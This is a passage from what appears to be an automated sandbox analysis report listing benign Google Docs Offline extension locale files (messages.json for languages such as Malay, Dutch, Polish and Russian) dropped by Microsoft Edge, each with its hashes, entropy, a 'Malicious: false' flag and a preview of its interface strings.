Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\sr\messages.json

Download File

